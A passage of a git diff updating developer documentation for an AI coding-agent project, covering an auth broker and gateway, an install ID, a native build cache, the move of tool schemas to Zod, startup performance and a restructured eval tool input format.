`0700` parent dir | + +`` resolves to `~/.omp/` (respecting `PI_CONFIG_DIR`). + +## Interaction with the local API-key resolution order + +The broker only owns OAuth credentials and provider-API-key credentials that were uploaded to it. The standard credential ladder in `models.md` (`Auth and API key resolution order`) is preserved, with one addition committed alongside the gateway: + +- `AuthStorage.setConfigApiKey / removeConfigApiKey / clearConfigApiKeys` let a `models.yml` `apiKey` beat a stored OAuth token **without** overriding an explicit `--api-key`. This is what allows a broker-resolved OAuth credential to be reliably shadowed by a per-environment `models.yml` config key when both are present. + +## See also + +- [`secrets.md`](./secrets.md) — secret obfuscation around tokens that *do* leak through (e.g. `OMP_AUTH_BROKER_TOKEN` in shell output). +- [`models.md`](./models.md) — provider auth resolution order; the broker plugs in at layers 2–3 (stored credentials). +- [`environment-variables.md`](./environment-variables.md) — full env reference including `OMP_AUTH_BROKER_URL` / `OMP_AUTH_BROKER_TOKEN`. diff --git a/docs/config-usage.md b/docs/config-usage.md index c6b9bd60d..561a73753 100644 --- a/docs/config-usage.md +++ b/docs/config-usage.md @@ -119,7 +119,7 @@ Supported formats: Behavior: -- Validates parsed data with AJV against a provided TypeBox schema. +- Validates parsed data against a provided Zod schema. - Caches load result until `invalidate()`. - Returns tri-state result via `tryLoad()`: - `ok` diff --git a/docs/custom-tools.md b/docs/custom-tools.md index a953920b9..46b85541b 100644 --- a/docs/custom-tools.md +++ b/docs/custom-tools.md @@ -6,7 +6,7 @@ A custom tool is a TypeScript/JavaScript module that exports a factory. The fact ## What this is (and is not) -- **Custom tool**: callable by the model during a turn (`execute` + Zod parameter schema; legacy TypeBox is still accepted and lifted to Zod at registration). +- **Custom tool**: callable by the model during a turn (`execute` + Zod parameter schema). - **Extension**: lifecycle/event framework that can register tools and intercept/modify events. - **Hook**: external pre/post command scripts. - **Skill**: static guidance/context package, not executable tool code. @@ -105,7 +105,7 @@ const factory: CustomToolFactory = (pi) => ({ export default factory; ``` -Legacy TypeBox-authored factories can still call `pi.typebox` — it's now a small Zod-backed shim (`Type.Object`, `Type.String`, etc.) baked into the host, not the real `@sinclair/typebox` package. Schemas flow through the same Zod pipeline as `pi.zod` and need no separate normalization. +Schemas are authored with Zod (`pi.zod`) and flow through the shared validation/wire pipeline. Factory return type: @@ -122,8 +122,7 @@ From `types.ts` and `loader.ts`: - `ui`: UI context (can be no-op in headless modes) - `hasUI`: `false` in non-interactive flows - `logger`: shared file logger -- `zod`: injected `zod` module (**preferred** for new tool schemas; use `pi.zod.object`, `pi.zod.string`, …) -- `typebox`: injected zod-backed `Type.*` shim (legacy extension compatibility) +- `zod`: injected `zod` module (use `pi.zod.object`, `pi.zod.string`, …) - `pi`: injected `@oh-my-pi/pi-coding-agent` exports - `pushPendingAction(action)`: register a preview action for hidden `resolve` tool (`docs/resolve-tool-runtime.md`) @@ -137,7 +136,7 @@ Loader starts with a no-op UI context and requires host code to call `setUIConte execute(toolCallId, params, onUpdate, ctx, signal); ``` -- `params` is statically typed from your Zod schema via `z.infer` (`Static` in API types). Legacy TypeBox schemas are lifted to Zod internally. +- `params` is statically typed from your Zod schema via `z.infer` (`Static` in API types). - Runtime argument validation happens before execution in the agent loop. - `onUpdate` emits partial results for UI streaming. - `ctx` includes session/model state and an `abort()` helper. diff --git a/docs/environment-variables.md b/docs/environment-variables.md index 518fcc005..01ec224b7 100644 --- a/docs/environment-variables.md +++ b/docs/environment-variables.md @@ -84,6 +84,17 @@ These are consumed via `getEnvApiKey()` (`packages/ai/src/stream.ts`) unless not | `GH_TOKEN` | Copilot fallback; GitHub API auth in web scraper | In web scraper: `GITHUB_TOKEN` → `GH_TOKEN` | | `GITHUB_TOKEN` | Copilot fallback; GitHub API auth in web scraper | In web scraper: checked before `GH_TOKEN` | +### Auth broker / auth gateway (remote credential vault) + +When the broker is enabled, the local SQLite credential store is bypassed and all OAuth refresh / access tokens live on the broker host. See [`auth-broker-gateway.md`](./auth-broker-gateway.md) for the full protocol, CLI surface, and 5-min/15-s usage cache layering. + +| Variable | Used for | Required when | Notes / precedence | +| ----------------------- | ------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | +| `OMP_AUTH_BROKER_URL` | Base URL of the remote auth-broker (e.g. `https://broker.tailnet:8765`); selects broker mode | Resolving credentials through a broker; also required by `omp auth-gateway serve` (the gateway is itself a broker client) | Wins over `auth.broker.url` in `config.yml`. When set with no resolvable token, `resolveAuthBrokerConfig()` hard-errors instead of falling back to local SQLite. | +| `OMP_AUTH_BROKER_TOKEN` | Bearer token sent on every broker endpoint except `/v1/healthz` | `OMP_AUTH_BROKER_URL` is set and no token is available from `auth.broker.token` or `/auth-broker.token` | Resolution: this env → `auth.broker.token` (`$ENV_NAME` indirection supported) → `/auth-broker.token` (mode `0600`). `` is `~/.omp/` (respecting `PI_CONFIG_DIR`). | + +The gateway has no dedicated env vars — it inherits `OMP_AUTH_BROKER_*`. Its own inbound bearer token lives at `/auth-gateway.token` and is managed via `omp auth-gateway token`. + --- ## 2) Provider-specific runtime configuration @@ -277,7 +288,7 @@ Extra conditional behavior: | `PI_SUBPROCESS_CMD` | Overrides subagent spawn command (`omp` / `omp.cmd` resolution bypass) | | `PI_TASK_MAX_OUTPUT_BYTES` | Max captured output bytes per subagent (default `500000`) | | `PI_TASK_MAX_OUTPUT_LINES` | Max captured output lines per subagent (default `5000`) | -| `PI_TIMING` | If `1`, enables startup/tool timing instrumentation logs | +| `PI_TIMING` | If set (any non-empty value), prints a hierarchical timing-span tree to **stderr** via `logger.printTimings()`. In interactive mode the tree prints once the agent is ready (before the TUI starts); in print mode it prints after the whole prompt batch completes. Print-mode prompts are wrapped in `print:prompt:initial` / `print:prompt:next` spans so each user message shows up as its own row. `PI_TIMING=x` exits the process with code 0 right after printing in interactive mode (use to measure cold startup only). `PI_TIMING=full` lists every module-load entry instead of just the top N. | | `PI_PACKAGE_DIR` | Overrides package asset base dir resolution (docs/examples/changelog path lookup) | | `PI_DISABLE_LSPMUX` | If `1`, disables lspmux detection/integration and forces direct LSP server spawning | | `PI_RPC_EMIT_TITLE` | Boolean-like flag enabling title events in RPC mode | diff --git a/docs/extensions.md b/docs/extensions.md index 1953a98d5..6b40ba71c 100644 --- a/docs/extensions.md +++ b/docs/extensions.md @@ -125,8 +125,7 @@ In interactive mode, `input` handlers run before the built-in first-message auto Also exposed: - `pi.logger` -- `pi.zod` (injected `zod` module — **preferred** for new tool schemas) -- `pi.typebox` (zod-backed `Type.*` shim — retained for legacy extension compat) +- `pi.zod` (injected `zod` module — use for tool parameter schemas) - `pi.pi` (package exports) ### Message delivery semantics diff --git a/docs/install-id.md b/docs/install-id.md new file mode 100644 index 000000000..4c7571132 --- /dev/null +++ b/docs/install-id.md @@ -0,0 +1,41 @@ +# Install ID + +A persistent per-install UUID that identifies a single oh-my-pi installation across sessions. Used as a stable correlation key for server-side dedup of telemetry-style pushes (currently the auto-QA grievance flush from `report_tool_issue`). + +## API + +Exported from `@oh-my-pi/pi-utils` (`packages/utils/src/dirs.ts`): + +| Symbol | Purpose | +| --- | --- | +| `getInstallId(): string` | Returns the install ID, generating and persisting one on first call. Result is cached in-process for the lifetime of the runtime. | +| `__resetInstallIdCacheForTests(): void` | Clears the in-process cache. Test-only — MUST NOT be called from production code. | + +The returned value is a canonical lowercase RFC 4122 UUID matching `^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$`. + +## Storage + +- Path: `/install-id` — i.e. `~/.omp/install-id` by default, respecting `PI_CONFIG_DIR` via `getConfigRootDir()`. +- Format: a single UUID line (trailing `\n`). +- Permissions: file is created with mode `0o600`. +- Lifecycle: independent of `~/.omp/agent/`. Wiping agent state (sessions, settings, DB) does NOT regenerate the install ID; only deleting the `install-id` file itself does. + +## Generation and lifecycle + +1. First call to `getInstallId()` reads the file. If contents parse as a valid UUID, that value is cached and returned. +2. Otherwise the helper calls `crypto.randomUUID()` (Node's CSPRNG-backed UUID v4) to mint a new ID. +3. The new value is written via `open(O_WRONLY | O_CREAT | O_EXCL, 0o600)`. The exclusive-create guard means two processes hitting first-call simultaneously cannot both succeed — the loser sees `EEXIST`, re-reads the winner's file, and adopts that ID. +4. If the existing file contained non-empty garbage (failed UUID regex), it is `unlink`ed before the exclusive create so `O_EXCL` does not trip on stale data. +5. Any other write failure (read-only FS, permission error) is swallowed: the freshly generated UUID is still cached in-memory so the rest of the process sees a stable value, and subsequent process launches will retry persistence. +6. Subsequent in-process calls return the cached value without touching disk. Mutating the file on disk after the first call has no effect until the process restarts (or tests call `__resetInstallIdCacheForTests`). + +## Consumers + +- `packages/coding-agent/src/tools/report-tool-issue.ts` — included as `installId` in the auto-QA grievance push body so the backend can deduplicate repeated reports from the same install. See `dev.autoqaPush.*` settings and `PI_AUTO_QA_PUSH_*` env vars. + +New consumers MUST treat the value as opaque and MUST NOT derive PII from it; the helper does not mix in hostname, username, or any other host-identifying entropy. + +## See also + +- [environment-variables.md](environment-variables.md) — `PI_CONFIG_DIR` controls where `install-id` lives. +- [config-usage.md](config-usage.md) — broader config-root layout. diff --git a/docs/models.md b/docs/models.md index 086fc487c..f8a311697 100644 --- a/docs/models.md +++ b/docs/models.md @@ -148,6 +148,17 @@ ModelRegistry pipeline (on refresh): - otherwise append 6. Load cached/runtime-discovered models (Ollama, llama.cpp, LM Studio, plus built-in provider managers), then re-apply model overrides. +### Provider-model cache and static fingerprint + +Cached per-provider model lists are persisted in the model-cache SQLite +database (schema v3) with a `static_fingerprint` column that hashes the +static catalog slice merged into the row. When `resolveProviderModels` +skips the network fetch and the fingerprint of the in-memory static +catalog matches the cached one, the cached rows are returned verbatim — +the static + dynamic merge is bypassed entirely. The fingerprint is +memoized per process via a WeakMap keyed by the static-models array +reference, so repeated cold-start calls do not re-hash. + ## Canonical model equivalence and coalescing The registry keeps every concrete provider model and then builds a canonical layer above them. @@ -309,6 +320,12 @@ Keyless providers: - Providers marked `auth: none` are treated as available without credentials. - `getApiKey*` returns `kNoAuth` for them. +### Broker mode + +When `OMP_AUTH_BROKER_URL` (or `auth.broker.url`) is set, the local SQLite credential store is replaced by `RemoteAuthCredentialStore`. Layers 2 and 3 above (stored API key / OAuth in `agent.db`) are served from a broker-supplied snapshot whose `refresh` tokens are redacted; expiry triggers `POST /v1/credential/:id/refresh` on the broker rather than a local refresh. + +`AuthStorage.setConfigApiKey` lets a `models.yml` `apiKey` win over a broker-resolved OAuth token without overriding a runtime `--api-key`. See [`auth-broker-gateway.md`](./auth-broker-gateway.md) for the full broker / gateway design and env surface (`OMP_AUTH_BROKER_URL`, `OMP_AUTH_BROKER_TOKEN`, `auth.broker.url`, `auth.broker.token`). + ## Model availability vs all models - `getAll()` returns the loaded model registry (built-in + merged custom + discovered). @@ -530,6 +547,14 @@ providers: ``` `disableStrictTools` is a provider-level flag that applies to all models in the provider. + +Tool schemas going on the wire are normalized by the unified flow in +`packages/ai/src/utils/schema/normalize.ts` (Google/CCA/MCP dispatchers +plus the OpenAI strict-mode sanitize+enforce pipeline). See +[`ai-schema-normalize.md`](./ai-schema-normalize.md) for the strict-mode +edge cases (local `$ref` inlining, single-item `allOf` collapse, +`anyOf`-wrapper description hoist, enum/const primitive-type inference) +and the per-provider dispatcher mapping. ## Practical examples ### Local OpenAI-compatible endpoint (no auth) diff --git a/docs/natives-binding-contract.md b/docs/natives-binding-contract.md index 1821be5b8..f787b58d2 100644 --- a/docs/natives-binding-contract.md +++ b/docs/natives-binding-contract.md @@ -68,7 +68,7 @@ Consumers in `packages/coding-agent` and `packages/tui` import directly from `@o | PTY | `new PtySession()`, `start/write/resize/kill` | `pty.rs` | class / promises | | Process | `killTree(pid, signal)`, `listDescendants(pid)` | `ps.rs` | sync | | Keys | `parseKey`, `matchesKey`, Kitty/legacy helpers | `keys.rs` | sync | -| Text | `wrapTextWithAnsi`, `truncateToWidth`, `sliceWithWidth`, `extractSegments`, `sanitizeText`, `visibleWidth` | `text.rs` | sync | +| Text | `wrapTextWithAnsi`, `truncateToWidth`, `sliceWithWidth`, `extractSegments`, `visibleWidth` | `text.rs` | sync | | Highlight | `highlightCode`, `supportsLanguage`, `getSupportedLanguages` | `highlight.rs` | sync | | HTML | `htmlToMarkdown(html, options?)` | `html.rs` | `Promise` | | Image | `PhotonImage`, `encodeSixel` | `image.rs` | class / sync / promises | diff --git a/docs/natives-build-release-debugging.md b/docs/natives-build-release-debugging.md index 579051d2d..83872e8c3 100644 --- a/docs/natives-build-release-debugging.md +++ b/docs/natives-build-release-debugging.md @@ -215,3 +215,74 @@ bun --cwd=packages/natives run embed:native # Reset embedded manifest to null stub bun --cwd=packages/natives run embed:native -- --reset ``` + +## Orchestrator-side content-addressed build cache (robomp) + +When `pi-natives` is built inside the robomp orchestrator (`python/robomp/`), workspaces share built artifacts through a content-addressed cache instead of rebuilding from scratch in every per-issue worktree. The cache is **orchestrator-side only** — `bun --cwd=packages/natives run build` itself is unchanged; the cache lives outside the build pipeline and is populated/captured around `ensure_workspace` and post-task success in `python/robomp/src/natives_cache.py`. + +### What is cached + +The complete set of files in `packages/natives/native/` that are pure functions of the cache-key inputs: + +- `pi_natives.-[-variant].node` (glob `pi_natives.*.node`) +- `index.d.ts` +- `index.js` +- `embedded-addon.js` +- `manifest.json` (cache metadata: key, target triple, capture timestamp, source workspace, commit) + +An entry is only considered a hit when the `.node` glob matches AND every companion plus the manifest is present. Partial entries are evicted on GC. + +### Cache key + +The key is `sha256` over `(path \t git-tree-hash \n)` pairs for the following inputs, in this order (order is significant), followed by the target triple: + +1. `crates` (whole subtree — pi-natives transitively depends on other workspace crates) +2. `Cargo.lock` +3. `Cargo.toml` +4. `rust-toolchain.toml` +5. `packages/natives` (whole subtree — build script, `scripts/*`, package.json with napi config) + +Tree hashes come from one `git cat-file --batch-check` invocation against `HEAD`; paths missing from `HEAD` fold in as a fixed null hash so the key stays deterministic across repos that don't ship every input. The target-triple suffix matches the napi addon basename convention (`-` for non-x64, `--` for x64). When `TARGET_VARIANT` is unset on an x64 host the variant component is `host` rather than autodetected — the key is stable on a given machine but a `modern`/`baseline` build with an explicit `TARGET_VARIANT` gets a different key. + +Anything outside this input set (Rust toolchain auto-installed delta, host glibc, env vars other than `TARGET_VARIANT`) is **not** in the key. If you need to invalidate after such a change, delete the cache directory by hand or bump one of the input files. + +### Layout and ownership + +- Root: `/data/cache/pi-natives` (provisioned by `entrypoint.sh` alongside the cargo caches, owned `root:omp`, mode `02770` setgid so cached files inherit `gid=omp` and stay readable by every slot user). +- Per-repo subdirectory: `//` where the slug is `owner__repo` (mirrors `SandboxManager.pool_path`). +- Per-entry directory: `///` containing the cached files plus `manifest.json`. +- Per-repo lockfile: `//.lock` (advisory `fcntl.flock`, exclusive on capture and GC). +- Staging dirs (`..tmp.`) during capture; renamed atomically into the final entry path. Stale staging dirs from crashed captures are swept on GC. + +### Populate and capture semantics + +- **Populate** (workspace ← cache) runs inside `ensure_workspace`. On a key hit the `.node` is **hardlinked** into the workspace (zero-copy, shared inode); the companion `index.d.ts` / `index.js` / `embedded-addon.js` are **copied** (independent inodes) because the napi build's `installGeneratedBindings` and `gen-enums.ts` rewrite those files via `open(..., 'w')` — an in-place truncate that would otherwise propagate through a hardlink and corrupt the cache. Cross-device hardlink failures (`EXDEV`) fall back to copy. +- **Capture** (cache ← workspace) runs from the post-task success path when the build produced a complete artifact set. Capture uses **copy**, not hardlink: hardlinking a slot-owned workspace file would preserve slot UID ownership on the cached inode and defeat the shared-group model. Copying creates a fresh root-owned, `gid=omp` inode via the setgid cache root. Capture is idempotent under the per-repo flock: a concurrent capture for the same key returns the existing entry. + +### Garbage collection + +A periodic GC loop runs in `WorkerPool` with two caps per repo. When either cap is exceeded, oldest entries (by `manifest.json.captured_at`) are dropped first: + +- entry count cap (`max_entries_per_repo`, default 8) +- byte cap (`max_bytes`, default 4 GiB) + +Workspaces that hardlinked a `.node` before GC retain access via the kernel inode refcount — `rmtree` of the cache entry does not delete the file from the workspace. + +### Configuration (settings on `robomp.config.Settings`) + +| Env var | Default | Effect | +| -------------------------------------------- | ------------------------ | ------------------------------------------------------------- | +| `ROBOMP_NATIVES_CACHE_ENABLED` | `true` | Master switch. When false the populate/capture hooks no-op and every workspace builds from scratch. | +| `ROBOMP_NATIVES_CACHE_ROOT` | `/data/cache/pi-natives` | Cache root directory. Must be `root:omp 02770` for cross-slot reads. | +| `ROBOMP_NATIVES_CACHE_MAX_ENTRIES_PER_REPO` | `8` | LRU entry-count cap, per repo slug. | +| `ROBOMP_NATIVES_CACHE_MAX_BYTES` | `4294967296` (4 GiB) | LRU byte cap, per repo slug. | +| `ROBOMP_NATIVES_CACHE_GC_INTERVAL_SECONDS` | `3600` | Period of the background GC loop in `WorkerPool`. | + +### Manual invalidation + +- One key: `rm -rf /data/cache/pi-natives//`. +- One repo: `rm -rf /data/cache/pi-natives/`. +- Everything: `rm -rf /data/cache/pi-natives/*` (preserve the root so its setgid mode survives). +- Stuck lock: `rm /data/cache/pi-natives//.lock` (only when no orchestrator process is touching the repo). + +Trigger an automatic miss by editing any path in the key set: a single touched byte under `crates/`, `Cargo.lock`, `Cargo.toml`, `rust-toolchain.toml`, or `packages/natives/` shifts the tree hash and forces a fresh build at the next populate. diff --git a/docs/natives-text-search-pipeline.md b/docs/natives-text-search-pipeline.md index bdf460d53..82bccfbb8 100644 --- a/docs/natives-text-search-pipeline.md +++ b/docs/natives-text-search-pipeline.md @@ -37,7 +37,6 @@ Terminology follows `docs/natives-architecture.md`: | `truncateToWidth(text, maxWidth, ellipsis, pad, tabWidth)` | `truncateToWidth` | `text.rs` | | `sliceWithWidth(line, startCol, length, strict, tabWidth)` | `sliceWithWidth` | `text.rs` | | `extractSegments(line, beforeEnd, afterStart, afterLen, strictAfter, tabWidth)` | `extractSegments` | `text.rs` | -| `sanitizeText(text)` | `sanitizeText` | `text.rs` | | `visibleWidth(text, tabWidth)` | `visibleWidth` | `text.rs` | | `highlightCode(code, lang, colors)` | `highlightCode` | `highlight.rs` | | `supportsLanguage(lang)` | `supportsLanguage` | `highlight.rs` | @@ -206,7 +205,7 @@ These are pure, in-memory utilities. - `truncateToWidth`: visible-cell truncation with ellipsis policy (`Unicode`, `Ascii`, `Omit`), optional right padding. - `sliceWithWidth`: column slicing with optional strict width enforcement. - `extractSegments`: extracts before/after segments around an overlay while restoring ANSI state for the `after` segment. -- `sanitizeText`: strips ANSI escapes + control chars, drops lone surrogates, normalizes line endings. +- `sanitizeText` (ANSI/control/surrogate stripping with line-ending normalization) no longer lives in `text.rs`; it moved to `@oh-my-pi/pi-utils` as a pure-JS implementation in `packages/utils/src/sanitize-text.ts`. The native binding was removed in the same change because the JS version was competitive on the benchmarked workloads, and keeping a Rust copy forced every caller (including `pi-utils`) to pull in `@oh-my-pi/pi-natives`. - `visibleWidth`: counts visible terminal cells using caller-supplied tab width. ### Failure behavior diff --git a/docs/sdk.md b/docs/sdk.md index cad7b6cb3..f6ee5d30f 100644 --- a/docs/sdk.md +++ b/docs/sdk.md @@ -308,6 +308,18 @@ type CreateAgentSessionResult = { Use `setToolUIContext(...)` only if your embedder provides UI capabilities that tools/extensions should call into. +## Startup performance + +`createAgentSession()` runs two background optimizations to overlap I/O with the rest of session setup: + +- **Model-host preconnect.** As soon as the model is resolved, the SDK fires a best-effort `fetch.preconnect(model.baseUrl)` so DNS + TCP + TLS + HTTP/2 to the provider's host happens in parallel with extension/skill load, tool registry build, and system-prompt assembly. The first real `fetch(...)` then reuses the warm connection, saving 100–300 ms on transcontinental hops (e.g. residential IP → `api.anthropic.com`). Implementation lives in `preconnectModelHost()` in `packages/coding-agent/src/sdk.ts`. If `fetch.preconnect` is unavailable (non-Bun runtime) or the call throws, the optimization is silently skipped — never a hard dependency. Applies to every mode (interactive, print, RPC, ACP). +- **Conditional LSP warmup.** Startup LSP servers (those returned by `discoverStartupLspServers(cwd)`) are only warmed when **all** of these hold: + - `enableLsp !== false` on the session options, **and** + - `options.hasUI === true` (interactive TUI), **and** + - the `lsp.diagnosticsOnWrite` setting is enabled. + + Print / script / RPC / ACP invocations (`hasUI=false`) skip the warmup entirely: they don't render the warmup status indicator and typically finish before the language servers would stabilize, so warming them just spends CPU parsing big `initialize` responses concurrently with the LLM stream consumer and jitters perceived latency. Tools that actually need an LSP server still spin one up on demand through `getOrCreateClient()` — only the *startup* warmup is skipped. The returned `lspServers` field in `CreateAgentSessionResult` is therefore `undefined` (not an empty array) whenever the warmup branch was bypassed. + ## Minimal controlled embed example ```ts diff --git a/docs/secrets.md b/docs/secrets.md index 2ec81bde6..0b7dcf760 100644 --- a/docs/secrets.md +++ b/docs/secrets.md @@ -106,3 +106,7 @@ Environment variables are collected first, then file-defined entries are appende - `packages/coding-agent/src/secrets/obfuscator.ts` -- `SecretObfuscator` class, placeholder generation, message obfuscation - `packages/coding-agent/src/secrets/regex.ts` -- regex literal parsing and compilation - `packages/coding-agent/src/config/settings-schema.ts` -- `secrets.enabled` setting definition + +## See also + +- [`auth-broker-gateway.md`](./auth-broker-gateway.md) -- remote credential vault and forward-proxy that keep provider OAuth refresh tokens and access tokens off developer hosts entirely (complementary to in-process obfuscation). diff --git a/docs/session-tree-plan.md b/docs/session-tree-plan.md index d5905a3f1..eea5120b2 100644 --- a/docs/session-tree-plan.md +++ b/docs/session-tree-plan.md @@ -181,6 +181,33 @@ Adjacent but related lifecycle hooks: - In-memory sessions never return a branch file path from `createBranchedSession`. - Tree context reconstruction includes service-tier and MCP tool-selection state, but those entries do not become LLM messages. +## Plan approval session naming + +When a user approves a plan from plan mode (`InteractiveMode.#approvePlan`), the approval handler seeds the session name from the plan's title so the resulting (fresh or compacted) session does not stay unnamed. + +Trigger: + +- Plan approval reaches `#approvePlan(...)` with `options.title` populated from the plan-approval details. +- This runs for every approval choice (`Approve and execute`, `Approve and compact context`, plain `Approve`); the synthetic `plan-approved` prompt is what otherwise bypasses the input-controller's title-generation path. + +Naming source: + +- The normalized plan title is humanized via `humanizePlanTitle(title)` (`packages/coding-agent/src/plan-mode/approved-plan.ts`): + - replaces runs of `-`/`_` with a single space + - trims whitespace + - capitalizes the first character + - returns `""` for whitespace-only / separator-only input +- The humanized name is applied with `sessionManager.setSessionName(name, "auto")`. Because `setSessionName` is a no-op when `titleSource === "user"`, the seeded name never overrides a name the user already chose (e.g. on the `preserveContext` path where the session continues with prior naming). +- On successful apply, the terminal title (`setSessionTerminalTitle`) and the editor border color are refreshed to reflect the new name. + +Examples (from `humanizePlanTitle`): + +- `migrate-mcp-loader` → `Migrate mcp loader` +- `fix_session_naming` → `Fix session naming` +- `foo--bar__baz` → `Foo bar baz` +- `RefactorRouter` → `RefactorRouter` (no separators to expand) +- `""` / `"---"` → `""` (no name applied) + ## Legacy compatibility still present Session migrations still run on load: diff --git a/docs/theme.md b/docs/theme.md index 98512bff5..a7129059e 100644 --- a/docs/theme.md +++ b/docs/theme.md @@ -341,6 +341,6 @@ Use this workflow: - All `colors` tokens are required for custom themes. - `export` and `symbols` are optional. -- `$schema` in theme JSON is informational; runtime validation is enforced by compiled TypeBox schema in code. +- `$schema` in theme JSON is informational; runtime validation is enforced by a Zod schema in code. - `setTheme` failure falls back to `dark`; `previewTheme` failure does not replace current theme. - File watcher reload errors or temporary missing files keep the current loaded theme until a successful reload or explicit theme switch. diff --git a/docs/tools/checkpoint.md b/docs/tools/checkpoint.md index 0dcdbe881..545e3dd4e 100644 --- a/docs/tools/checkpoint.md +++ b/docs/tools/checkpoint.md @@ -15,7 +15,7 @@ | Field | Type | Required | Description | | --- | --- | --- | --- | -| `goal` | `string` | Yes | Investigation goal. Required by the TypeBox schema and echoed in the tool result. | +| `goal` | `string` | Yes | Investigation goal. Required by the schema and echoed in the tool result. | ## Outputs The tool returns a single text result plus structured details: diff --git a/docs/tools/eval.md b/docs/tools/eval.md index da9f37f36..573241f3b 100644 --- a/docs/tools/eval.md +++ b/docs/tools/eval.md @@ -8,8 +8,6 @@ - Entry: `packages/coding-agent/src/tools/eval.ts` - Model-facing prompt: `packages/coding-agent/src/prompts/tools/eval.md` - Key collaborators: - - `packages/coding-agent/src/eval/parse.ts` — lenient cell parser - - `packages/coding-agent/src/eval/sniff.ts` — language sniffing heuristics - `packages/coding-agent/src/eval/backend.ts` — backend execution contract - `packages/coding-agent/src/eval/js/index.ts` — JS backend adapter - `packages/coding-agent/src/eval/js/executor.ts` — JS execution + output sink @@ -24,36 +22,33 @@ ## Inputs +Tool parameters are a JSON object with a single `cells` field — an ordered array of cell objects. Each cell is a structured record; there is no `*** Cell` header parsing, no language sniffing, and no implicit single-cell fallback. Cells run in array order; state persists within each language across cells and across tool calls. + | Field | Type | Required | Description | | --- | --- | --- | --- | -| `input` | `string` | Yes | Cell program text. Parsed by `parseEvalInput()` in `packages/coding-agent/src/eval/parse.ts`, not by JSON subfields. | +| `cells` | `EvalCellInput[]` | Yes | Cells executed in order. At least one cell is required (`.min(1)`). | -`input` syntax accepted at runtime: +Each `EvalCellInput` (from `evalCellSchema` in `packages/coding-agent/src/tools/eval.ts`): -- Cell header: `*** Cell `. Attributes are space-separated tokens with quoted titles (`"..."` or `'...'`). -- Canonical tokens (advertised in the prompt): - - `:""` — language + title shorthand. `lang` is `py` or `js` (lenient: also `ts`, plus the long-form aliases `python`, `javascript`, `typescript`, `ipy`, `ipython`). - - `t:<n>[ms|s|m]` — per-cell timeout (default 30s). - - `rst` — wipe this cell's language kernel before running. -- Lenient additional tokens (accepted by the parser, not advertised): - - bare language token (`py`, `js`) - - `id:"..."` / `title:"..."` / `name:"..."` / `cell:"..."` / `file:"..."` / `label:"..."` — title aliases - - `timeout:` / `duration:` / `time:` — `t:` aliases - - `reset` — `rst` alias - - `rst:true|false|1|0|yes|no|on|off` — explicit boolean form - - a bare positional duration token (`30s`, `2m`, `500ms`) - - any unclassified bare token folds into a positional title fragment -- Cell body: every following line until the next `*** Cell ...`, the optional `*** End`, or `*** Abort`. `*** End` is a quirk fix for GPT-trained models that emit terminators and is not documented in the prompt. +| Field | Type | Required | Description | +| --- | --- | --- | --- | +| `language` | `"py" \| "js"` | Yes | Backend selector. `"py"` maps to the IPython/Jupyter kernel (`python` backend); `"js"` maps to the persistent JavaScript VM. | +| `code` | `string` | Yes | Cell body, verbatim. JSON-encoded — embed newlines, quotes, and indentation directly; no fences, no headers. | +| `title` | `string` | No | Short label rendered in the transcript (e.g. `"imports"`, `"load config"`). | +| `timeout` | `integer` | No | Per-cell timeout in seconds, clamped to `1..600`. Defaults to 30 when omitted. | +| `reset` | `boolean` | No | Wipe this cell's language kernel before running. Reset is per-language: a `py` cell's reset does not touch the JS VM and vice versa. Defaults to `false`. | -Leniencies in `packages/coding-agent/src/eval/parse.ts`: +Minimal example matching the live schema: -- Markers accept two or more leading `*` and flexible whitespace. -- `*** End` is optional everywhere; the parser silently consumes trailing tokens (e.g. `*** End py`). -- Missing terminators between adjacent cells are tolerated; the next `*** Cell` closes the prior cell, and stray non-marker lines between cells fold into the prior cell's body without crashing. -- Bare code or a single markdown fence such as ```` ```py ```` is treated as one implicit cell. -- If `*** Abort` appears, the in-progress cell is dropped and the result carries an abort warning. To preserve a completed cell before `*** Abort`, emit `*** End` first. - -The tool also exposes a custom Lark grammar from `packages/coding-agent/src/eval/eval.lark` for constrained sampling. That grammar is stricter than the runtime parser: it requires the canonical `*** Cell <lang>:"title"` header form with a fixed attribute order, advertises only `py` / `js`, and pins the trailing `*** End` so GPT-trained models' natural terminator habit aligns with the constrained output. +```json +{ + "cells": [ + { "language": "py", "title": "imports", "timeout": 10, "code": "import json\nfrom pathlib import Path" }, + { "language": "py", "title": "load config", "code": "data = json.loads(read('package.json'))\ndisplay(data)" }, + { "language": "js", "title": "summary", "reset": true, "code": "const data = JSON.parse(await read('package.json'));\ndisplay(data);\nreturn data.name;" } + ] +} +``` ## Outputs @@ -69,17 +64,17 @@ Returned shape: - `jsonOutputs`: structured values emitted via `display(...)` - `images`: image payloads emitted by Python rich display or JS `display({ type: "image", ... })` - `statusEvents`: aggregated helper/tool status events - - `notice`: backend fallback notice + - `notice`: backend fallback notice (currently unused; reserved for future per-cell notices) - `meta`: truncation metadata - `isError`: set on cell failure or cancellation Renderer behavior in `packages/coding-agent/src/tools/eval.ts`: -- call preview renders parsed code cells with syntax highlighting +- call preview renders each cell's `code` with syntax highlighting based on its declared `language` - result view renders each cell separately, including status, duration, and output - markdown outputs are rendered with the Markdown component instead of plain text - `jsonOutputs` render as a tree, collapsed or expanded depending on UI state -- timeout / fallback / truncation notices render as dim metadata lines +- timeout / truncation notices render as dim metadata lines - images are carried in `details.images`; generic tool UI image handling renders them outside the text block Side-channel artifacts: @@ -89,54 +84,48 @@ Side-channel artifacts: ## Flow -1. `EvalTool.execute()` in `packages/coding-agent/src/tools/eval.ts` parses `params.input` with `parseEvalInput()`. -2. `parseEvalInput()` normalizes newlines, collects cells, parses attributes, and assigns each cell a language from the header, language sniffing, or the default `python`. -3. Back in `execute()`, each parsed cell is resolved to a backend with `resolveBackend()`: - - explicit `python`/`js` requests are validated against session settings and backend availability - - otherwise `sniffEvalLanguage()` in `packages/coding-agent/src/eval/sniff.ts` tries shebangs and language markers - - if no explicit language was present, later cells prefer the previous runtime language before re-sniffing - - Python is preferred when available; JS is the fallback when Python is unavailable or disabled -4. The tool allocates an `OutputSink`, a `TailBuffer`, per-cell result objects, and a `sessionAbortController`. `session.trackEvalExecution?.(...)` can wrap the whole run for external cancellation tracking. -5. Cells execute sequentially. For each cell, `execute()`: - - clamps the cell timeout through `clampTimeout("eval", ...)` +1. `EvalTool.execute()` in 